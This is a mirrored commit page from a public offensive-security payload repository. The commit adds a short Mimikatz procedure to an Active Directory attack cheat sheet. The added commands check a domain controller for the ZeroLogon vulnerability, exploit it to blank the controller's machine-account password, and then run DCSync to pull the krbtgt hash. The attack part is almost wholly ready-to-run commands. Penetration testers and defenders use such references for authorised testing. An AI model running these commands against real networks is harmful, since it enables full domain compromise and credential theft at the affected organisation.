Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 14:52:53 +00:00
Code Issues Projects Releases Packages Wiki Activity

ZeroLogon via Mimikatz

Browse source
This commit is contained in:
Swissky 2020-09-16 14:13:40 +02:00
parent e79918bdc2
commit 14586e4d7a
1 changed files with 11 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
Methodology and Resources/Active Directory Attack.md
View file

@ -292,6 +292,17 @@ $ secretsdump.py 'domain/DC01$@DC01.domain.local' -hashes aad3b435b51404eeaad3b4
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000000:::
```
with Mimikatz : 2.2.0 20200916 ZeroLogon & DCSync
```powershell
privilege::debug
# check for the CVE
lsadump::zerologon /target:DC01.corp.local /account:DC01$
# exploit the CVE and set the computer account's password to ""
lsadump::zerologon /target:DC01.corp.local /account:DC01$ /exploit
# dcsync to extract some hashes
lsadump::dcsync /domain:CORP.LOCAL /dc:dc01.corp.local /user:krbtgt /authuser:DC01$ /authdomain:CORP /authpassword:"" /authntlm
```
### Open Shares